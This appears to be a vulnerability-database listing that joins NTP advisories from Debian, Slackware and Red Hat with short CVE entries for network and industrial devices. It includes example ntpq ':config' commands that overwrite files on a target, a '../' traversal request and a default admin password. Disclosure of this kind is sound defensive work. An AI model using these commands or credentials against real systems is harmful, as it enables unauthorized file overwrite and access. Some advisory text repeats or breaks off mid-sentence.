Miroslav Lichvar of Red Hat found that the :config command can be
used to set the pidfile and driftfile paths without any
restrictions. A remote attacker could use this flaw to overwrite a
file on the file system with a file containing the pid of the ntpd
process (immediately) or the current estimated drift of the system
clock (in hourly intervals). For example:
ntpq -c ':config pidfile /tmp/ntp.pid'
ntpq -c ':config driftfile /tmp/ntp.drift'
In Debian ntpd is configured to drop root privileges, which limits
the impact of this issue.
CVE-2015-7704
If ntpd as an NTP client receives a Kiss-of-Death (KoD) packet
from the server to reduce its polling rate, it doesn't check if the
originate timestamp in the reply matches the transmit timestamp from
its request. An off-path attacker can send a crafted KoD packet to
the client, which will increase the client's polling interval to a
large value and effectively disable synchronization with the server.
CVE-2015-7850
An exploitable denial of service vulnerability exists in the remote
configuration functionality of the Network Time Protocol. A
specially crafted configuration file could cause an endless loop
resulting in a denial of service. An attacker could provide a the
malicious configuration file to trigger this vulnerability.
CVE-2015-7852
A potential off by one vulnerability exists in the cookedprint
functionality of ntpq. A specially crafted buffer could cause a
buffer overflow potentially resulting in null byte being written out
of bounds.
CVE-2015-7855
It was found that NTP's decodenetnum() would abort with an assertion
failure when processing a mode 6 or mode 7 packet containing an
unusually long data value where a network address was expected. This
could allow an authenticated attacker to crash ntpd.
CVE-2015-7871
An error handling logic error exists within ntpd that manifests due
to improper error condition handling associated with certain
crypto-NAK packets. An unauthenticated, off-path attacker can force
ntpd processes on targeted servers to peer with time sources of the
attacker's choosing by transmitting symmetric active crypto-NAK
packets to ntpd. This attack bypasses the authentication typically
required to establish a peer association and allows an attacker to
make arbitrary changes to system time.
For the oldstable distribution (wheezy), these problems have been fixed
in version 1:4.2.6.p5+dfsg-2+deb7u6.
For the stable distribution (jessie), these problems have been fixed in
version 1:4.2.6.p5+dfsg-7+deb8u1.
For the testing distribution (stretch), these problems have been fixed
in version 1:4.2.8p4+dfsg-3.
For the unstable distribution (sid), these problems have been fixed in
version 1:4.2.8p4+dfsg-3.
We recommend that you upgrade your ntp packages.
Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz: Upgraded.
In addition to bug fixes and enhancements, this release fixes
several low and medium severity vulnerabilities.
For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9750
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5196
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871
(* Security fix *)
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated package for Slackware 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p4-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p4-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p4-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p4-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.1.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p4-i586-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p4-x86_64-1.txz
MD5 signatures:
+-------------+
Slackware 13.0 package:
21dd14178fea17a88c9326c8672ecefd ntp-4.2.8p4-i486-1_slack13.0.txz
Slackware x86_64 13.0 package:
8647479b2007b92ff8598184f2275263 ntp-4.2.8p4-x86_64-1_slack13.0.txz
Slackware 13.1 package:
e0f122e8e271dc84db06202c03cc0288 ntp-4.2.8p4-i486-1_slack13.1.txz
Slackware x86_64 13.1 package:
db0aff04b72b3d8c96ca8c8e1ed36c05 ntp-4.2.8p4-x86_64-1_slack13.1.txz
Slackware 13.37 package:
5914e43e886e5ff88fefd30083493e30 ntp-4.2.8p4-i486-1_slack13.37.txz
Slackware x86_64 13.37 package:
4335c3bf2ae24afc5ad734e8d80b3e94 ntp-4.2.8p4-x86_64-1_slack13.37.txz
Slackware 14.0 package:
39b05698797b638b67130e0b170e0a4b ntp-4.2.8p4-i486-1_slack14.0.txz
Slackware x86_64 14.0 package:
dcf4a56ba1d013ee1c9d0e624e158709 ntp-4.2.8p4-x86_64-1_slack14.0.txz
Slackware 14.1 package:
1fd3a7beaf23303e2c211af377662614 ntp-4.2.8p4-i486-1_slack14.1.txz
Slackware x86_64 14.1 package:
438c3185aa8ec20d1c2b5e51786e4d41 ntp-4.2.8p4-x86_64-1_slack14.1.txz
Slackware -current package:
81bfb2fed450cb26a51b5e1cee0d33ed n/ntp-4.2.8p4-i586-1.txz
Slackware x86_64 -current package:
8bae4ad633af40d4d54b7686e4b225f9 n/ntp-4.2.8p4-x86_64-1.txz
Installation instructions:
+------------------------+
Upgrade the package as root:
# upgradepkg ntp-4.2.8p4-i486-1_slack14.1.txz
Then, restart the NTP daemon:
# sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address
| VAR-201510-0706 | CVE-2014-9751 | NTP Project Network Time Protocol daemon (ntpd) contains multiple vulnerabilities (Updated) |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
The read_network_packet function in ntp_io.c in ntpd in NTP 4.x before 4.2.8p1 on Linux and OS X does not properly determine whether a source IP address is an IPv6 loopback address, which makes it easier for remote attackers to spoof restricted packets, and read or write to the runtime state, by leveraging the ability to reach the ntpd machine's network interface with a packet from the ::1 address. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. Supplementary information : CWE Vulnerability type by CWE-17: Code ( code ) Has been identified. NTP is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions and to perform unauthorized actions; this may aid in launching further attacks. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: ntp security, bug fix, and enhancement update
Advisory ID: RHSA-2015:2231-04
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2231.html
Issue date: 2015-11-19
CVE Names: CVE-2014-9297 CVE-2014-9298 CVE-2014-9750
CVE-2014-9751 CVE-2015-1798 CVE-2015-1799
CVE-2015-3405
=====================================================================
1. Summary:
Updated ntp packages that fix multiple security issues, several bugs, and
add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
3. Description:
The Network Time Protocol (NTP) is used to synchronize a computer's time
with another referenced time source. These packages include the ntpd
service which continuously adjusts system time and utilities used to query
and configure the ntpd service.
It was found that because NTP's access control was based on a source IP
address, an attacker could bypass source IP restrictions and send
malicious control and configuration packets by spoofing ::1 addresses.
(CVE-2014-9298, CVE-2014-9751)
A denial of service flaw was found in the way NTP hosts that were peering
with each other authenticated themselves before updating their internal
state variables. An attacker could send packets to one peer host, which
could cascade to other peers, and stop the synchronization process among
the reached peers. (CVE-2015-1799)
A flaw was found in the way the ntp-keygen utility generated MD5 symmetric
keys on big-endian systems. An attacker could possibly use this flaw to
guess generated MD5 keys, which could then be used to spoof an NTP client
or server. (CVE-2015-3405)
A stack-based buffer overflow was found in the way the NTP autokey protocol
was implemented. (CVE-2014-9297, CVE-2014-9750)
It was found that ntpd did not check whether a Message Authentication Code
(MAC) was present in a received packet when ntpd was configured to use
symmetric cryptographic keys. A man-in-the-middle attacker could use this
flaw to send crafted packets that would be accepted by a client or a peer
without the attacker knowing the symmetric key. (CVE-2015-1798)
The CVE-2015-1798 and CVE-2015-1799 issues were discovered by Miroslav
Lichvár of Red Hat.
Bug fixes:
* The ntpd service truncated symmetric keys specified in the key file to 20
bytes. As a consequence, it was impossible to configure NTP authentication
to work with peers that use longer keys. With this update, the maximum key
length has been changed to 32 bytes. (BZ#1191111)
* The ntpd service could previously join multicast groups only when
starting, which caused problems if ntpd was started during system boot
before network was configured. With this update, ntpd attempts to join
multicast groups every time network configuration is changed. (BZ#1207014)
* Previously, the ntp-keygen utility used the exponent of 3 when generating
RSA keys. Consequently, generating RSA keys failed when FIPS mode was
enabled. With this update, ntp-keygen has been modified to use the exponent
of 65537, and generating keys in FIPS mode now works as expected.
(BZ#1191116)
* The ntpd service dropped incoming NTP packets if their source port was
lower than 123 (the NTP port). With this update, ntpd no longer checks the
source port number, and clients behind NAT are now able to correctly
synchronize with the server. (BZ#1171640)
Enhancements:
* This update adds support for configurable Differentiated Services Code
Points (DSCP) in NTP packets, simplifying configuration in large networks
where different NTP implementations or versions are using different DSCP
values. (BZ#1202828)
* This update adds the ability to configure separate clock stepping
thresholds for each direction (backward and forward). Use the "stepback"
and "stepfwd" options to configure each threshold. (BZ#1193154)
* Support for nanosecond resolution has been added to the Structural
Health Monitoring (SHM) reference clock. Prior to this update, when a
Precision Time Protocol (PTP) hardware clock was used as a time source to
synchronize the system clock, the accuracy of the synchronization was
limited due to the microsecond resolution of the SHM protocol. The
nanosecond extension in the SHM protocol now allows sub-microsecond
synchronization of the system clock. (BZ#1117702)
All ntp users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues and add these
enhancements.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1117702 - SHM refclock doesn't support nanosecond resolution
1122012 - SHM refclock allows only two units with owner-only access
1171640 - NTP drops requests when sourceport is below 123
1180721 - ntp: mreadvar command crash in ntpq
1184572 - CVE-2014-9298 CVE-2014-9751 ntp: drop packets with source address ::1
1184573 - CVE-2014-9297 CVE-2014-9750 ntp: vallen in extension fields are not validated
1191108 - ntpd should warn when monitoring facility can't be disabled due to restrict configuration
1191122 - ntpd -x steps clock on leap second
1193154 - permit differential fwd/back threshold for step vs. slew [PATCH]
1199430 - CVE-2015-1798 ntp: ntpd accepts unauthenticated packets with symmetric key crypto
1199435 - CVE-2015-1799 ntp: authentication doesn't protect symmetric associations against DoS attacks
1210324 - CVE-2015-3405 ntp: ntp-keygen may generate non-random symmetric keys on big-endian systems
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
ntp-4.2.6p5-22.el7.src.rpm
x86_64:
ntp-4.2.6p5-22.el7.x86_64.rpm
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch:
ntp-doc-4.2.6p5-22.el7.noarch.rpm
ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64:
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
ntp-4.2.6p5-22.el7.src.rpm
x86_64:
ntp-4.2.6p5-22.el7.x86_64.rpm
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch:
ntp-doc-4.2.6p5-22.el7.noarch.rpm
ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64:
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
ntp-4.2.6p5-22.el7.src.rpm
aarch64:
ntp-4.2.6p5-22.el7.aarch64.rpm
ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm
ntpdate-4.2.6p5-22.el7.aarch64.rpm
ppc64:
ntp-4.2.6p5-22.el7.ppc64.rpm
ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm
ntpdate-4.2.6p5-22.el7.ppc64.rpm
ppc64le:
ntp-4.2.6p5-22.el7.ppc64le.rpm
ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm
ntpdate-4.2.6p5-22.el7.ppc64le.rpm
s390x:
ntp-4.2.6p5-22.el7.s390x.rpm
ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm
ntpdate-4.2.6p5-22.el7.s390x.rpm
x86_64:
ntp-4.2.6p5-22.el7.x86_64.rpm
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64:
ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm
sntp-4.2.6p5-22.el7.aarch64.rpm
noarch:
ntp-doc-4.2.6p5-22.el7.noarch.rpm
ntp-perl-4.2.6p5-22.el7.noarch.rpm
ppc64:
ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm
sntp-4.2.6p5-22.el7.ppc64.rpm
ppc64le:
ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm
sntp-4.2.6p5-22.el7.ppc64le.rpm
s390x:
ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm
sntp-4.2.6p5-22.el7.s390x.rpm
x86_64:
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
ntp-4.2.6p5-22.el7.src.rpm
x86_64:
ntp-4.2.6p5-22.el7.x86_64.rpm
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch:
ntp-doc-4.2.6p5-22.el7.noarch.rpm
ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64:
ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm
sntp-4.2.6p5-22.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-9297
https://access.redhat.com/security/cve/CVE-2014-9298
https://access.redhat.com/security/cve/CVE-2014-9750
https://access.redhat.com/security/cve/CVE-2014-9751
https://access.redhat.com/security/cve/CVE-2015-1798
https://access.redhat.com/security/cve/CVE-2015-1799
https://access.redhat.com/security/cve/CVE-2015-3405
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD4DBQFWTkFJXlSAg2UNWIIRAphzAKCRHDVdHI5OvJ8glkXYLBwyQgeyvwCYmTV3
1hLTu5I/PUzWOnD8rRIlZQ==
=sWdG
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce. An attacker could use a specially crafted
package to cause ntpd to crash if:
* ntpd enabled remote configuration
* The attacker had the knowledge of the configuration password
* The attacker had access to a computer entrusted to perform remote
configuration
Note that remote configuration is disabled by default in NTP.
CVE-2015-5194
It was found that ntpd could crash due to an uninitialized
variable when processing malformed logconfig configuration
commands.
CVE-2015-5195
It was found that ntpd exits with a segmentation fault when a
statistics type that was not enabled during compilation (e.g.
timingstats) is referenced by the statistics or filegen
configuration command
CVE-2015-5219
It was discovered that sntp program would hang in an infinite loop
when a crafted NTP packet was received, related to the conversion
of the precision value in the packet to double.
CVE-2015-5300
It was found that ntpd did not correctly implement the -g option:
Normally, ntpd exits with a message to the system log if the offset
exceeds the panic threshold, which is 1000 s by default. This
option allows the time to be set to any value without restriction;
however, this can happen only once. If the threshold is exceeded
after that, ntpd will exit with a message to the system log. This
option can be used with the -q and -x options.
ntpd could actually step the clock multiple times by more than the
panic threshold if its clock discipline doesn't have enough time to
reach the sync state and stay there for at least one update. If a
man-in-the-middle attacker can control the NTP traffic since ntpd
was started (or maybe up to 15-30 minutes after that), they can
prevent the client from reaching the sync state and force it to step
its clock by any amount any number of times, which can be used by
attackers to expire certificates, etc.
This is contrary to what the documentation says. Normally, the
assumption is that an MITM attacker can step the clock more than the
panic threshold only once when ntpd starts and to make a larger
adjustment the attacker has to divide it into multiple smaller
steps, each taking 15 minutes, which is slow.
CVE-2015-7691, CVE-2015-7692, CVE-2015-7702
It was found that the fix for CVE-2014-9750 was incomplete: three
issues were found in the value length checks in ntp_crypto.c, where
a packet with particular autokey operations that contained malicious
data was not always being completely validated. Receipt of these
packets can cause ntpd to crash.
CVE-2015-7701
A memory leak flaw was found in ntpd's CRYPTO_ASSOC.
CVE-2015-7703
Miroslav Lichvar of Red Hat found that the :config command can be
used to set the pidfile and driftfile paths without any
restrictions. A remote attacker could use this flaw to overwrite a
file on the file system with a file containing the pid of the ntpd
process (immediately) or the current estimated drift of the system
clock (in hourly intervals). For example:
ntpq -c ':config pidfile /tmp/ntp.pid'
ntpq -c ':config driftfile /tmp/ntp.drift'
In Debian ntpd is configured to drop root privileges, which limits
the impact of this issue.
CVE-2015-7704
If ntpd as an NTP client receives a Kiss-of-Death (KoD) packet
from the server to reduce its polling rate, it doesn't check if the
originate timestamp in the reply matches the transmit timestamp from
its request. An off-path attacker can send a crafted KoD packet to
the client, which will increase the client's polling interval to a
large value and effectively disable synchronization with the server.
CVE-2015-7850
An exploitable denial of service vulnerability exists in the remote
configuration functionality of the Network Time Protocol. A
specially crafted configuration file could cause an endless loop
resulting in a denial of service. An attacker could provide a the
malicious configuration file to trigger this vulnerability.
CVE-2015-7852
A potential off by one vulnerability exists in the cookedprint
functionality of ntpq. A specially crafted buffer could cause a
buffer overflow potentially resulting in null byte being written out
of bounds.
CVE-2015-7855
It was found that NTP's decodenetnum() would abort with an assertion
failure when processing a mode 6 or mode 7 packet containing an
unusually long data value where a network address was expected. This
could allow an authenticated attacker to crash ntpd.
CVE-2015-7871
An error handling logic error exists within ntpd that manifests due
to improper error condition handling associated with certain
crypto-NAK packets. An unauthenticated, off-path attacker can force
ntpd processes on targeted servers to peer with time sources of the
attacker's choosing by transmitting symmetric active crypto-NAK
packets to ntpd. This attack bypasses the authentication typically
required to establish a peer association and allows an attacker to
make arbitrary changes to system time.
For the oldstable distribution (wheezy), these problems have been fixed
in version 1:4.2.6.p5+dfsg-2+deb7u6.
For the stable distribution (jessie), these problems have been fixed in
version 1:4.2.6.p5+dfsg-7+deb8u1.
For the testing distribution (stretch), these problems have been fixed
in version 1:4.2.8p4+dfsg-3.
For the unstable distribution (sid), these problems have been fixed in
version 1:4.2.8p4+dfsg-3.
We recommend that you upgrade your ntp packages
| VAR-201412-0434 | CVE-2014-9223 | Allegro rompager buffer overflow vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Multiple buffer overflows in AllegroSoft RomPager, as used in Huawei Home Gateway products and other vendors and products, allow remote attackers to cause a denial of service or possibly execute arbitrary code via unspecified vectors related to authorization. Allegro's RomPager is an embedded WEB service product, which is more used to provide WWW management capabilities for network printers, switches and other network devices.
Allegro RomPager is vulnerable to a buffer overflow because it fails to perform adequate boundary checks on user-supplied input. An attacker could exploit this vulnerability to execute arbitrary code in the context of an affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Allegro RomPager 4.07 and prior to 4.34 are vulnerable
| VAR-201904-0511 | CVE-2014-5435 | Honeywell Experion PKS 'dual_onsrv.exe' Module Remote Code Execution Vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
An arbitrary memory write vulnerability exists in the dual_onsrv.exe module in Honeywell Experion PKS R40x before R400.6, R41x before R410.6, and R43x before R430.2, that could lead to possible remote code execution or denial of service. Honeywell strongly encourages and recommends all customers running unsupported versions of EKPS prior to R400 to upgrade to a supported version. Honeywell Experion PKS Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Honeywell EPKS is used in the automation and control of industrial and production processes and is a distributed control system solution, including a web-based SCADA system. Or initiate a denial of service attack. Failed exploit attempts will result in a denial-of-service condition.
The following versions are affected:
Honeywell Experion R40x versions prior to Experion PKS R400.6
Honeywell Experion R41x versions prior to Experion PKS R410.6
Honeywell Experion R43x versions prior to Experion PKS R430.2
| VAR-201412-0413 | CVE-2014-9193 | Innominate mGuard In the firmware root Privileged vulnerability |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
Innominate mGuard with firmware before 7.6.6 and 8.x before 8.1.4 allows remote authenticated admins to obtain root privileges by changing a PPP configuration setting. mGuard is a product line of Innominate, including firewalls and VPN network security devices. Innominate mGuard is prone to a remote privilege-escalation vulnerability.
A remote attacker can exploit this issue to gain root privileges and execute arbitrary commands.
Innominate mGuard 8.1.3 and prior are vulnerable. A security vulnerability exists in Innominate mGuard using firmware versions prior to 7.6.6 and 8.x versions prior to 8.1.4
| VAR-201412-0586 | CVE-2014-7249 | Multiple Allied Telesis products vulnerable to buffer overflow |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Buffer overflow on the Allied Telesis AR440S, AR441S, AR442S, AR745, AR750S, AR750S-DP, AT-8624POE, AT-8624T/2M, AT-8648T/2SP, AT-8748XL, AT-8848, AT-9816GB, AT-9924T, AT-9924Ts, CentreCOM AR415S, CentreCOM AR450S, CentreCOM AR550S, CentreCOM AR570S, CentreCOM 8700SL, CentreCOM 8948XL, CentreCOM 9924SP, CentreCOM 9924T/4SP, Rapier 48i, and SwitchBlade4000 with firmware before 2.9.1-21 allows remote attackers to execute arbitrary code via a crafted HTTP POST request. Allied Telesis AT-RG634A ADSL Broadband Router is an ADSL broadband router product from Allied Telesis. A buffer overflow vulnerability exists in multiple Allied Telesis products that use firmware version 2.9.1-21. Failed exploit attempts may result in a denial-of-service condition. The following products and versions are affected: Allied Telesis AR440S, AR441S, AR442S, AR745, AR750S, AR750S-DP, AT-8624POE, AT-8624T/2M, AT-8648T/2SP, AT- 8748XL , AT-8848 , AT-9816GB , AT-9924T , AT-9924Ts , CentreCOM AR415S , CentreCOM AR450S , CentreCOM AR550S , CentreCOM AR570S , CentreCOM 8700SL , CentreCOM 8948XL , CentreCOM 9924SP , CentreCOM 9924T/4SP , Rapier 48i , SwitchBlade4000
| VAR-201412-0101 | CVE-2014-9406 | ARRIS Touchstone TG862G/CT Telephony Gateway Vulnerabilities in which access rights can be obtained in firmware |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
ARRIS Touchstone TG862G/CT Telephony Gateway with firmware 7.6.59S.CT and earlier has a default password of password for the admin account, which makes it easier for remote attackers to obtain access via a request to home_loggedout.php. ARRIS Touchstone TG862G/CT Telephony Gateway is a Modem (Modem) router integrated machine from Arris Group of the United States. Touchstone Tg862g%2Fct Firmware is prone to a remote security vulnerability. A remote attacker could exploit this vulnerability by sending a request to the home_loggedout.php script to gain access
| VAR-201903-0651 | CVE-2014-9187 | Honeywell Experion PKS Module buffer error vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
Multiple heap-based buffer overflow vulnerabilities exist in Honeywell Experion PKS all versions prior to R400.6, all versions prior to R410.6, and all versions prior to R430.2 modules, which could lead to possible remote code execution or denial of service. Honeywell strongly encourages and recommends all customers running unsupported versions of EKPS prior to R400 to upgrade to a supported version. Honeywell Experion PKS The module contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Honeywell EPKS is used in the automation and control of industrial and production processes and is a distributed control system solution, including a web-based SCADA system. Honeywell Experion PKS has multiple remote heap buffer overflow vulnerabilities because it fails to perform sufficient boundary checking on user-supplied inputs. Allows an attacker to exploit a vulnerability to execute arbitrary code or initiate a denial of service attack in the context of the affected user's application.
The following versions are affected:
Honeywell Experion R40x versions prior to Experion PKS R400.6
Honeywell Experion R41x versions prior to Experion PKS R410.6
Honeywell Experion R43x versions prior to Experion PKS R430.2
| VAR-201904-0512 | CVE-2014-5436 | Honeywell Experion PKS 'confd.exe' Module directory traversal vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A directory traversal vulnerability exists in the confd.exe module in Honeywell Experion PKS R40x before R400.6, R41x before R410.6, and R43x before R430.2, which could lead to possible information disclosure. Honeywell strongly encourages and recommends all customers running unsupported versions of EKPS prior to R400 to upgrade to a supported version. Honeywell Experion PKS Contains a path traversal vulnerability.Information may be obtained. Honeywell EPKS is used in the automation and control of industrial and production processes and is a distributed control system solution, including a web-based SCADA system. A remote attacker can use a specially crafted request ('../') with a directory traversal sequence to retrieve arbitrary files from the application for sensitive information. Information obtained could aid in further attacks.
The following versions are affected:
Honeywell Experion R40x versions prior to Experion PKS R400.6
Honeywell Experion R41x versions prior to Experion PKS R410.6
Honeywell Experion R43x versions prior to Experion PKS R430.2
| VAR-201903-0652 | CVE-2014-9189 | Honeywell Experion PKS Module buffer error vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
Multiple stack-based buffer overflow vulnerabilities were found in Honeywell Experion PKS all versions prior to R400.6, all versions prior to R410.6, and all versions prior to R430.2 modules that could lead to possible remote code execution, dynamic memory corruption, or denial of service. Honeywell strongly encourages and recommends all customers running unsupported versions of EKPS prior to R400 to upgrade to a supported version. Honeywell Experion PKS The module contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Honeywell EPKS is used in the automation and control of industrial and production processes and is a distributed control system solution, including a web-based SCADA system. Honeywell Experion PKS has multiple stack buffer overflow vulnerabilities because the application failed to properly check the user-supplied data before copying it to a full-size buffer. A remote attacker could exploit these vulnerabilities to execute arbitrary code or cause dynamic memory corruption in the context of an affected application. Failed attempts will likely cause a denial-of-service condition.
The following versions are affected:
Honeywell Experion R40x versions prior to Experion PKS R400.6
Honeywell Experion R41x versions prior to Experion PKS R410.6
Honeywell Experion R43x versions prior to Experion PKS R430.2.
The vulnerability is due to insufficient boundary checks performed on the user-supplied input by the affected software. An attacker could exploit this vulnerability by sending a crafted request to the affected software.
Honeywell has confirmed this vulnerability and released updated software
| VAR-201412-0537 | CVE-2014-8272 | Multiple Dell iDRAC IPMI v1.5 implementations use insufficiently random session ID values |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
